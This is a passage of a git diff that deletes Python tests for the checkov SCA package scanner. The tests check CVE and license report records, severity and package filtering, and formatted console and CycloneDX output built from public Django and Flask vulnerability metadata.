"{\"Critical severity\":{},\"Attack vector: network\":{},\"Has fix\":{},\"Attack complexity: low\":{}}", - "id": "CVE-2019-19844", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-19844", - "description": "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user\\'s email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. 
(One mitigation in the new releases is to send password reset tokens only to the registered user email address.)", - "packageVersion": "1.2", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "packageName": "django", - "publishedDate": "2019-12-18T19:15:00Z", - "cvss": 9.8, - "status": "OPEN", - "cveStatus": "1.11.27", - "fileMetadataId": "d9f631f2-86b3-4d47-9b23-a2529c255392", - "ViolationResource": { - "scannerType": "Twistcli", - "customerName": "ipeleg", - "status": "OPEN", - "firstDetectionDate": None, - "updatedDate": "2022-08-23T09:37:27.207Z", - "resourceId": "/packages/requirements.txt", - "violationId": "BC_VUL_2", - "sourceId": "itai1357/terragoat1", - "ticket": None, - "metadataFixId": None, - "originalResourceDefinition": None, - "fixedResourceDefinition": None, - "errorLine": None, - "resourcePlanId": None, - "errorLines": None, - "variableCode": None, - "variableFixCode": None, - "resourceFixCode": None, - "gitBlameMetadataId": None - }, - "isRootPackage": None, - "packageId": "49d27c4c-68cc-4eeb-ab98-d40a11334fdf", - "causePackageId": "49d27c4c-68cc-4eeb-ab98-d40a11334fdf", - } - - # when - record = create_report_cve_record( - rootless_file_path=rootless_file_path, - file_abs_path=file_abs_path, - check_class=check_class, - vulnerability_details=vulnerability_details, - licenses='OSI_BDS', - scan_data_format=ScanDataFormat.PLATFORM, - package={'package_registry': "https://registry.npmjs.org/", 'is_private_registry': False}, - ) - - # then - - # in the case of scan_data_format=ScanDataFormat.FROM_PLATFORM we just have to make sure that 'status' and - # 'fix_version' are as expected, as the rest are the same as in default flow - # (can_data_format=ScanDataFormat.FROM_TWISTCLI) - assert "lowest_fixed_version" not in record.vulnerability_details - assert "fixed_versions" not in record.vulnerability_details - assert record.vulnerability_details["fix_version"] == '1.11.27' - - -def test_create_report_cve_record_moderate_severity(): - # given - 
rootless_file_path = "requirements.txt" - file_abs_path = "/path/to/requirements.txt" - check_class = "checkov.sca_package.scanner.Scanner" - vulnerability_details = { - "id": "CVE-2019-19844", - "status": "fixed in 3.0.1, 2.2.9, 1.11.27", - "cvss": 9.8, - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "description": "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. ...", - "severity": "moderate", - "packageName": "django", - "packageVersion": "1.2", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-19844", - "riskFactors": ["Attack complexity: low", "Attack vector: network", "Critical severity", "Has fix"], - "impactedVersions": ["<1.11.27"], - "publishedDate": "2019-12-18T20:15:00+01:00", - "discoveredDate": "2019-12-18T19:15:00Z", - "fixDate": "2019-12-18T20:15:00+01:00", - } - - # when - record = create_report_cve_record( - rootless_file_path=rootless_file_path, - file_abs_path=file_abs_path, - check_class=check_class, - vulnerability_details=vulnerability_details, - licenses='OSI_BDS', - package={'package_registry': "https://registry.npmjs.org/", 'is_private_registry': False}, - ) - - # then - assert record.severity == Severities[BcSeverities.MEDIUM] - - -def test_create_report_cve_record_severity_filter(): - # given - rootless_file_path = "requirements.txt" - file_abs_path = "/path/to/requirements.txt" - check_class = "checkov.sca_package.scanner.Scanner" - vulnerability_details = { - "id": "CVE-2019-19844", - "status": "fixed in 3.0.1, 2.2.9, 1.11.27", - "cvss": 9.8, - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "description": "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. 
...", - "severity": "moderate", - "packageName": "django", - "packageVersion": "1.2", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-19844", - "riskFactors": ["Attack complexity: low", "Attack vector: network", "Critical severity", "Has fix"], - "impactedVersions": ["<1.11.27"], - "publishedDate": "2019-12-18T20:15:00+01:00", - "discoveredDate": "2019-12-18T19:15:00Z", - "fixDate": "2019-12-18T20:15:00+01:00", - } - - # when - record = create_report_cve_record( - rootless_file_path=rootless_file_path, - file_abs_path=file_abs_path, - check_class=check_class, - vulnerability_details=vulnerability_details, - runner_filter=RunnerFilter(checks=['HIGH']), - licenses='OSI_BDS', - package={'package_registry': "https://registry.npmjs.org/", 'is_private_registry': False}, - ) - - # then - assert record.bc_check_id == "BC_CVE_2019_19844" - assert record.check_id == "CKV_CVE_2019_19844" - assert record.check_class == check_class - assert record.check_name == "SCA package scan" - assert record.check_result == {"result": CheckResult.SKIPPED, 'suppress_comment': 'Filtered by severity'} - assert record.code_block == [(0, "django: 1.2")] - assert ( - record.description - == "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. ..." 
- ) - assert record.file_abs_path == file_abs_path - assert record.file_line_range == [0, 0] - assert record.file_path == f"/{rootless_file_path}" - assert record.repo_file_path == file_abs_path - assert record.resource == "requirements.txt.django" - assert record.severity == Severities[BcSeverities.MEDIUM] - assert record.short_description == "CVE-2019-19844 - django: 1.2" - assert record.vulnerability_details["lowest_fixed_version"] == "1.11.27" - assert record.vulnerability_details["fixed_versions"] == [ - packaging_version.parse("3.0.1"), - packaging_version.parse("2.2.9"), - packaging_version.parse("1.11.27"), - ] - assert record.vulnerability_details["licenses"] == 'OSI_BDS' - - -def test_create_report_cve_record_package_filter(): - # given - rootless_file_path = "requirements.txt" - file_abs_path = "/path/to/requirements.txt" - check_class = "checkov.sca_package.scanner.Scanner" - vulnerability_details = { - "id": "CVE-2019-19844", - "status": "fixed in 3.0.1, 2.2.9, 1.11.27", - "cvss": 9.8, - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "description": "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. 
...", - "severity": "critical", - "packageName": "django", - "packageVersion": "1.2", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-19844", - "riskFactors": ["Attack complexity: low", "Attack vector: network", "Critical severity", "Has fix"], - "impactedVersions": ["<1.11.27"], - "publishedDate": "2019-12-18T20:15:00+01:00", - "discoveredDate": "2019-12-18T19:15:00Z", - "fixDate": "2019-12-18T20:15:00+01:00", - } - - # when - record = create_report_cve_record( - rootless_file_path=rootless_file_path, - file_abs_path=file_abs_path, - check_class=check_class, - vulnerability_details=vulnerability_details, - runner_filter=RunnerFilter(skip_cve_package=['django', 'requests']), - licenses='OSI_BDS', - package={'package_registry': "https://registry.npmjs.org/", 'is_private_registry': False}, - ) - - # then - assert record.bc_check_id == "BC_CVE_2019_19844" - assert record.check_id == "CKV_CVE_2019_19844" - assert record.check_class == check_class - assert record.check_name == "SCA package scan" - assert record.check_result == {"result": CheckResult.SKIPPED, "suppress_comment": "Filtered by package 'django'"} - assert record.code_block == [(0, "django: 1.2")] - assert ( - record.description - == "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. ..." 
- ) - assert record.file_abs_path == file_abs_path - assert record.file_line_range == [0, 0] - assert record.file_path == f"/{rootless_file_path}" - assert record.repo_file_path == file_abs_path - assert record.resource == "requirements.txt.django" - assert record.severity == Severities[BcSeverities.CRITICAL] - assert record.short_description == "CVE-2019-19844 - django: 1.2" - assert record.vulnerability_details["lowest_fixed_version"] == "1.11.27" - assert record.vulnerability_details["fixed_versions"] == [ - packaging_version.parse("3.0.1"), - packaging_version.parse("2.2.9"), - packaging_version.parse("1.11.27"), - ] - assert record.vulnerability_details["licenses"] == 'OSI_BDS' - - -def test_calculate_lowest_compliant_version(): - # given - package_versions_list = [ - ["3.0.1", "2.2.9", "1.11.27", "1.9.8"], - ["1.9.8", "1.8.14"], - ["1.9.10", "1.8.15"], - ["3.2.4", "3.1.12", "2.2.24"], - ] - - fix_versions_lists = [ - [packaging_version.parse(version) for version in package_versions] for package_versions in package_versions_list - ] - - # when - compliant_version = calculate_lowest_compliant_version(fix_versions_lists) - - # then - assert compliant_version == "2.2.24" - - -def test_create_cli_cves_table(mocker): - mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", return_value=True) - # given - file_path = "/path/to/requirements.txt" - cve_count = CveCount(total=6, critical=0, high=3, medium=2, low=0, skipped=1, has_fix=5, to_fix=5) - package_details_map = { - "django": { - "cves": [ - {"id": "CVE-2016-7401", "severity": "high", "fixed_version": "1.8.15"}, - {"id": "CVE-2016-6186", "severity": "medium", "fixed_version": "1.8.14"}, - {"id": "CVE-2021-33203", "severity": "medium", "fixed_version": "2.2.24"}, - ], - "current_version": "1.2", - "compliant_version": "2.2.24", - }, - "flask": { - "cves": [ - {"id": "CVE-2019-1010083", "severity": "high", "fixed_version": "1.0"}, - {"id": "CVE-2018-1000656", "severity": "high", 
"fixed_version": "0.12.3"}, - ], - "current_version": "0.6", - "compliant_version": "1.0", - }, - } - - # when - table = create_cli_cves_table( - file_path=file_path, - cve_count=cve_count, - package_details_map=package_details_map, - ) - - # then - assert table == "".join( - [ - "\t/path/to/requirements.txt - CVEs Summary:\n", - "\t┌────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┐\n", - "\t│ Total CVEs: 6 │ critical: 0 │ high: 3 │ medium: 2 │ low: 0 │ skipped: 1 │\n", - "\t├────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┤\n", - "\t│ To fix 5/5 CVEs, go to your Prisma Cloud account │\n", - "\t├────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┤\n", - "\t│ Package │ CVE ID │ Severity │ Current version │ Fixed version │ Compliant version │\n", - "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤\n", - "\t│ django │ CVE-2016-7401 │ high │ 1.2 │ 1.8.15 │ 2.2.24 │\n", - "\t│ │ CVE-2016-6186 │ medium │ │ 1.8.14 │ │\n", - "\t│ │ CVE-2021-33203 │ medium │ │ 2.2.24 │ │\n", - "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤\n", - "\t│ flask │ CVE-2019-1010083 │ high │ 0.6 │ 1.0 │ 1.0 │\n", - "\t│ │ CVE-2018-1000656 │ high │ │ 0.12.3 │ │\n", - "\t└────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┘\n", - ] - ) - - -def test_create_cli_license_violations_table(mocker): - mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", return_value=True) - - # given - file_path = "/requirements.txt" - - package_licenses_details_map = { - "django": [ - { - "package_name": "django", - "package_version": 
"1.2", - "license": "DUMMY_LICENSE", - "status": "OPEN", - "policy": "BC_LIC_1" - }, - { - "package_name": "django", - "package_version": "1.2", - "license": "DUMMY_LICENSE2", - "status": "OPEN", - "policy": "BC_LIC_1" - }, - ], - "flask": [ - { - "package_name": "flask", - "package_version": "0.6", - "license": "DUMMY_LICENSE3", - "status": "OPEN", - "policy": "BC_LIC_1" - }, - ] - } - - # when - table = create_cli_license_violations_table( - file_path=file_path, - package_licenses_details_map=package_licenses_details_map - ) - - # then - assert table == "".join( - [ - "\t/requirements.txt - Licenses Statuses:\n", - "\t┌────────────────────────┬────────────────────────┬────────────────────────┬────────────────────────┬─────────────────────────┐\n", - "\t│ Package name │ Package version │ Policy ID │ License │ Status │\n", - "\t├────────────────────────┼────────────────────────┼────────────────────────┼────────────────────────┼─────────────────────────┤\n", - "\t│ django │ 1.2 │ BC_LIC_1 │ DUMMY_LICENSE │ OPEN │\n", - "\t│ │ │ BC_LIC_1 │ DUMMY_LICENSE2 │ OPEN │\n", - "\t├────────────────────────┼────────────────────────┼────────────────────────┼────────────────────────┼─────────────────────────┤\n", - "\t│ flask │ 0.6 │ BC_LIC_1 │ DUMMY_LICENSE3 │ OPEN │\n", - "\t└────────────────────────┴────────────────────────┴────────────────────────┴────────────────────────┴─────────────────────────┘\n", - ] - ) - - -def test_create_cli_cves_table_with_no_found_vulnerabilities(mocker): - mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", return_value=True) - - # given - file_path = "/path/to/requirements.txt" - cve_count = CveCount(total=2, critical=0, high=0, medium=0, low=0, skipped=2, has_fix=0, to_fix=0) - package_details_map = {} - - # when - table = create_cli_cves_table( - file_path=file_path, - cve_count=cve_count, - package_details_map=package_details_map, - ) - - # then - assert table == "".join( - [ - "\t/path/to/requirements.txt - CVEs 
Summary:\n", - "\t┌────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┐\n", - "\t│ Total CVEs: 2 │ critical: 0 │ high: 0 │ medium: 0 │ low: 0 │ skipped: 2 │\n", - "\t├────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┤\n", - "\t│ To fix 0/0 CVEs, go to your Prisma Cloud account │\n", - "\t└─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┘\n", - ] - ) - - -def test_create_cli_output(mocker): - mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", return_value=True) - # given - rootless_file_path = "requirements.txt" - file_abs_path = "/path/to/requirements.txt" - check_class = "checkov.sca_package.scanner.Scanner" - license_statuses = [ - { - "package_name": "django", - "package_version": "1.2", - "license": "DUMMY_LICENSE", - "status": "OPEN", - "policy": "BC_LIC_1" - }, - { - "package_name": "flask", - "package_version": "0.6", - "license": "DUMMY_OTHER_LICENSE", # not a real license. 
it is just for test a package with 2 licenses - "status": "OPEN", - "policy": "BC_LIC_1" - } - ] - # when - cves_records = [ - create_report_cve_record( - rootless_file_path=rootless_file_path, - file_abs_path=file_abs_path, - check_class=check_class, - vulnerability_details=details, - licenses='Unknown', - package={'package_registry': "https://registry.npmjs.org/", 'is_private_registry': False}, - ) - for details in get_vulnerabilities_details() - ] - license_records = [ - create_report_license_record( - rootless_file_path=rootless_file_path, - file_abs_path=file_abs_path, - check_class=check_class, - licenses_status=license_status, - package={'package_registry': "https://registry.npmjs.org/", 'is_private_registry': False}, - ) - for license_status in license_statuses - ] - cli_output = create_cli_output(True, cves_records + license_records) - - # then - assert cli_output == "".join( - [ - "\t/requirements.txt - CVEs Summary:\n", - "\t┌────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┐\n", - "\t│ Total CVEs: 2 │ critical: 1 │ high: 0 │ medium: 1 │ low: 0 │ skipped: 0 │\n", - "\t├────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┤\n", - "\t│ To fix 2/2 CVEs, go to your Prisma Cloud account │\n", - "\t├────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┤\n", - "\t│ Package │ CVE ID │ Severity │ Current version │ Fixed version │ Compliant version │\n", - "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤\n", - "\t│ django │ CVE-2019-19844 │ critical │ 1.2 │ 1.11.27 │ 1.11.27 │\n", - "\t│ │ CVE-2016-6186 │ medium │ │ 1.8.14 │ │\n", - "\t└────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┘\n", - 
"\n", - "\t/requirements.txt - Licenses Statuses:\n", - "\t┌────────────────────────┬────────────────────────┬────────────────────────┬────────────────────────┬─────────────────────────┐\n", - "\t│ Package name │ Package version │ Policy ID │ License │ Status │\n", - "\t├────────────────────────┼────────────────────────┼────────────────────────┼────────────────────────┼─────────────────────────┤\n", - "\t│ django │ 1.2 │ BC_LIC_1 │ DUMMY_LICENSE │ FAILED │\n", - "\t├────────────────────────┼────────────────────────┼────────────────────────┼────────────────────────┼─────────────────────────┤\n", - "\t│ flask │ 0.6 │ BC_LIC_1 │ DUMMY_OTHER_LICENSE │ FAILED │\n", - "\t└────────────────────────┴────────────────────────┴────────────────────────┴────────────────────────┴─────────────────────────┘\n", - ] - ) - - -def test_create_cli_output_without_license_records(mocker): - mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", return_value=True) - # given - rootless_file_path = "requirements.txt" - file_abs_path = "/path/to/requirements.txt" - check_class = "checkov.sca_package.scanner.Scanner" - # when - cves_records = [ - create_report_cve_record( - rootless_file_path=rootless_file_path, - file_abs_path=file_abs_path, - check_class=check_class, - vulnerability_details=details, - licenses='Unknown', - package={'package_registry': "https://registry.npmjs.org/", 'is_private_registry': False}, - ) - for details in get_vulnerabilities_details() - ] - cli_output = create_cli_output(True, cves_records) - - # then - assert cli_output == "".join( - [ - "\t/requirements.txt - CVEs Summary:\n", - "\t┌────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┐\n", - "\t│ Total CVEs: 2 │ critical: 1 │ high: 0 │ medium: 1 │ low: 0 │ skipped: 0 │\n", - "\t├────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┤\n", - "\t│ To 
fix 2/2 CVEs, go to your Prisma Cloud account │\n", - "\t├────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┤\n", - "\t│ Package │ CVE ID │ Severity │ Current version │ Fixed version │ Compliant version │\n", - "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤\n", - "\t│ django │ CVE-2019-19844 │ critical │ 1.2 │ 1.11.27 │ 1.11.27 │\n", - "\t│ │ CVE-2016-6186 │ medium │ │ 1.8.14 │ │\n", - "\t└────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┘\n", - ] - ) - - -def test_create_cli_output_without_cve_records(mocker): - mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", return_value=True) - # given - rootless_file_path = "requirements.txt" - file_abs_path = "/path/to/requirements.txt" - check_class = "checkov.sca_package.scanner.Scanner" - license_statuses = [ - { - "package_name": "django", - "package_version": "1.2", - "license": "DUMMY_LICENSE", - "status": "OPEN", - "policy": "BC_LIC_1" - }, - { - "package_name": "flask", - "package_version": "0.6", - "license": "DUMMY_OTHER_LICENSE", # not a real license. 
it is just for test a package with 2 licenses - "status": "OPEN", - "policy": "BC_LIC_1" - } - ] - # when - license_records = [ - create_report_license_record( - rootless_file_path=rootless_file_path, - file_abs_path=file_abs_path, - check_class=check_class, - licenses_status=license_status, - package={'package_registry': "https://registry.npmjs.org/", 'is_private_registry': False}, - ) - for license_status in license_statuses - ] - cli_output = create_cli_output(True, license_records) - - # then - assert cli_output == "".join( - [ - "\t/requirements.txt - Licenses Statuses:\n", - "\t┌────────────────────────┬────────────────────────┬────────────────────────┬────────────────────────┬─────────────────────────┐\n", - "\t│ Package name │ Package version │ Policy ID │ License │ Status │\n", - "\t├────────────────────────┼────────────────────────┼────────────────────────┼────────────────────────┼─────────────────────────┤\n", - "\t│ django │ 1.2 │ BC_LIC_1 │ DUMMY_LICENSE │ FAILED │\n", - "\t├────────────────────────┼────────────────────────┼────────────────────────┼────────────────────────┼─────────────────────────┤\n", - "\t│ flask │ 0.6 │ BC_LIC_1 │ DUMMY_OTHER_LICENSE │ FAILED │\n", - "\t└────────────────────────┴────────────────────────┴────────────────────────┴────────────────────────┴─────────────────────────┘\n", - ] - ) diff --git a/tests/sca_package/test_output_reports.py b/tests/sca_package/test_output_reports.py deleted file mode 100644 index f9057eab7f6..00000000000 --- a/tests/sca_package/test_output_reports.py +++ /dev/null 
@@ -1,744 +0,0 @@
-import json
-import xml
-import xml.dom.minidom
-import os
-from operator import itemgetter
-from pathlib import Path
-from typing import List
-
-from pytest_mock import MockerFixture
-
-from checkov.common.bridgecrew.check_type import CheckType
-from checkov.common.output.csv import CSVSBOM, FILE_NAME_OSS_PACKAGES
-from checkov.common.output.cyclonedx import CycloneDX
-from checkov.common.output.sarif import Sarif
-
-EXAMPLES_DIR = Path(__file__).parent / "examples"
-OUTPUTS_DIR = Path(__file__).parent / "outputs"
-
-
-def _get_deterministic_items_in_cyclonedx(pretty_xml_as_list: List[str]) -> List[str]:
- # the lines with the fields "serialNumber", "bom-ref" and "timestamp" contain some not-deterministic data (uuids,
- # timestamp). so we skip these lines by the first 'if when checking whether we get the expected results
- # in addition also the line that display the checkov version may be changeable, so we skip it as well
- # (in the second 'if')
- black_list_words = ["bom-ref", "serialNumber", "timestamp", "bom", "xml"]
- filtered_list = []
- for i, line in enumerate(pretty_xml_as_list):
- if not any(word in line for word in black_list_words):
- if i == 0 or not any(tool_name in pretty_xml_as_list[i - 1] for tool_name in
- ("checkov", "cyclonedx-python-lib")):
- filtered_list.append(line)
- return filtered_list
-
-
-def test_console_output(mocker, sca_package_report):
- mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", False)
- console_output = sca_package_report.print_console(False, False, None, None, False)
-
- # then
- assert console_output == "\n".join(
- [
- "sca_package scan results:",
- "",
- "Failed checks: 9, Skipped checks: 0",
- "",
- "\t/path/to/requirements.txt - CVEs Summary:",
- "\t┌────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┐",
- "\t│ Total CVEs: 6 │ critical: 1 │ high: 3 │ medium: 2 │ low: 0 │ skipped: 0 │",
-
"\t├────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┤", - "\t│ To fix 6/6 CVEs, go to your Prisma Cloud account │", - "\t├────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┤", - "\t│ Package │ CVE ID │ Severity │ Current version │ Fixed version │ Compliant version │", - "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤", - "\t│ flask │ CVE-2019-1010083 │ high │ 0.6 │ 1.0 │ 1.0 │", - "\t│ │ CVE-2018-1000656 │ high │ │ 0.12.3 │ │", - "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤", - "\t│ django │ CVE-2019-19844 │ critical │ 1.2 │ 1.11.27 │ 2.2.24 │", - "\t│ │ CVE-2016-7401 │ high │ │ 1.8.15 │ │", - "\t│ │ CVE-2016-6186 │ medium │ │ 1.8.14 │ │", - "\t│ │ CVE-2021-33203 │ medium │ │ 2.2.24 │ │", - "\t└────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┘", - "", - "\t/path/to/requirements.txt - Licenses Statuses:", - "\t┌────────────────────────┬────────────────────────┬────────────────────────┬────────────────────────┬─────────────────────────┐", - "\t│ Package name │ Package version │ Policy ID │ License │ Status │", - "\t├────────────────────────┼────────────────────────┼────────────────────────┼────────────────────────┼─────────────────────────┤", - "\t│ flask │ 0.6 │ BC_LIC_1 │ DUMMY_OTHER_LICENSE │ FAILED │", - "\t└────────────────────────┴────────────────────────┴────────────────────────┴────────────────────────┴─────────────────────────┘", - "", - "\t/path/to/go.sum - CVEs Summary:", - "\t┌────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┐", - "\t│ Total CVEs: 2 │ critical: 0 │ high: 2 │ medium: 0 │ 
low: 0 │ skipped: 0 │", - "\t├────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┤", - "\t│ To fix 2/2 CVEs, go to your Prisma Cloud account │", - "\t├────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┤", - "\t│ Package │ CVE ID │ Severity │ Current version │ Fixed version │ Compliant version │", - "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤", - "\t│ golang.org/x/crypt │ CVE-2020-29652 │ high │ v0.0.1 │ 0.0.2 │ 0.0.2 │", - "\t│ o │ │ │ │ │ │", - "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤", - "\t│ github.com/dgrijal │ CVE-2020-26160 │ high │ v3.2.0 │ 4.0.0rc1 │ 4.0.0rc1 │", - "\t│ va/jwt-go │ │ │ │ │ │", - "\t└────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┘", - "", - ] - ) - - -def test_console_output_in_tty(mocker: MockerFixture, sca_package_report): - # simulate a tty call by enforcing color - mocker.patch.dict(os.environ, {"FORCE_COLOR": "True"}) - mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", False) - - console_output = sca_package_report.print_console(False, False, None, None, False) - # then - assert console_output == "\n".join( - [ - "\x1b[34msca_package scan results:", - "\x1b[0m\x1b[36m", - "Failed checks: 9, Skipped checks: 0", - "", - "\x1b[0m\t/path/to/requirements.txt - CVEs Summary:", - "\t┌────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┐", - "\t│ Total CVEs: 6 │ critical: 1 │ high: 3 │ medium: 2 │ low: 0 │ skipped: 0 │", - 
"\t├────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┤", - "\t│ To fix 6/6 CVEs, go to your Prisma Cloud account │", - "\t├────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┤", - "\t│ Package │ CVE ID │ Severity │ Current version │ Fixed version │ Compliant version │", - "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤", - "\t│ flask │ CVE-2019-1010083 │ high │ 0.6 │ 1.0 │ 1.0 │", - "\t│ │ CVE-2018-1000656 │ high │ │ 0.12.3 │ │", - "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤", - "\t│ django │ CVE-2019-19844 │ critical │ 1.2 │ 1.11.27 │ 2.2.24 │", - "\t│ │ CVE-2016-7401 │ high │ │ 1.8.15 │ │", - "\t│ │ CVE-2016-6186 │ medium │ │ 1.8.14 │ │", - "\t│ │ CVE-2021-33203 │ medium │ │ 2.2.24 │ │", - "\t└────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┘", - "", - "\t/path/to/requirements.txt - Licenses Statuses:", - "\t┌────────────────────────┬────────────────────────┬────────────────────────┬────────────────────────┬─────────────────────────┐", - "\t│ Package name │ Package version │ Policy ID │ License │ Status │", - "\t├────────────────────────┼────────────────────────┼────────────────────────┼────────────────────────┼─────────────────────────┤", - "\t│ flask │ 0.6 │ BC_LIC_1 │ DUMMY_OTHER_LICENSE │ FAILED │", - "\t└────────────────────────┴────────────────────────┴────────────────────────┴────────────────────────┴─────────────────────────┘", - "", - "\t/path/to/go.sum - CVEs Summary:", - "\t┌────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┐", - "\t│ Total CVEs: 2 │ critical: 0 │ high: 2 │ medium: 0 │ 
low: 0 │ skipped: 0 │", - "\t├────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┤", - "\t│ To fix 2/2 CVEs, go to your Prisma Cloud account │", - "\t├────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┤", - "\t│ Package │ CVE ID │ Severity │ Current version │ Fixed version │ Compliant version │", - "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤", - "\t│ golang.org/x/crypt │ CVE-2020-29652 │ high │ v0.0.1 │ 0.0.2 │ 0.0.2 │", - "\t│ o │ │ │ │ │ │", - "\t├────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┼────────────────────┤", - "\t│ github.com/dgrijal │ CVE-2020-26160 │ high │ v3.2.0 │ 4.0.0rc1 │ 4.0.0rc1 │", - "\t│ va/jwt-go │ │ │ │ │ │", - "\t└────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┘", - "", - ] - ) - - -def test_get_cyclonedx_report(sca_package_report, tmp_path: Path): - cyclonedx_reports = [sca_package_report] - cyclonedx = CycloneDX(repo_id="bridgecrewio/example", reports=cyclonedx_reports) - cyclonedx_output = cyclonedx.get_xml_output() - pretty_xml_as_string = str(xml.dom.minidom.parseString(cyclonedx_output).toprettyxml()) - with open(os.path.join(OUTPUTS_DIR, "results_cyclonedx.xml")) as f_xml: - expected_pretty_xml = f_xml.read() - - actual_pretty_xml_as_list = _get_deterministic_items_in_cyclonedx(pretty_xml_as_string.split("\n")) - expected_pretty_xml_as_list = _get_deterministic_items_in_cyclonedx(expected_pretty_xml.split("\n")) - - assert actual_pretty_xml_as_list == expected_pretty_xml_as_list - - -def test_get_cyclonedx_report_with_licenses_with_comma(sca_package_report_with_comma_in_licenses, tmp_path: Path): - cyclonedx_reports = [sca_package_report_with_comma_in_licenses] - 
cyclonedx = CycloneDX(repo_id="bridgecrewio/example", reports=cyclonedx_reports)
- cyclonedx_output = cyclonedx.get_xml_output()
-
- pretty_xml_as_string = str(xml.dom.minidom.parseString(cyclonedx_output).toprettyxml())
-
- with open(os.path.join(OUTPUTS_DIR, "results_cyclonedx_with_comma_in_licenses.xml")) as f_xml:
- expected_pretty_xml = f_xml.read()
-
- actual_pretty_xml_as_list = _get_deterministic_items_in_cyclonedx(pretty_xml_as_string.split("\n"))
- expected_pretty_xml_as_list = _get_deterministic_items_in_cyclonedx(expected_pretty_xml.split("\n"))
-
- assert actual_pretty_xml_as_list == expected_pretty_xml_as_list
-
-
-def test_get_cyclonedx_json_report_with_licenses_with_comma(tmp_path: Path, sca_package_report_with_comma_in_licenses):
- # given
- cyclonedx_reports = [sca_package_report_with_comma_in_licenses]
- cyclonedx = CycloneDX(repo_id="bridgecrewio/example", reports=cyclonedx_reports)
-
- # when
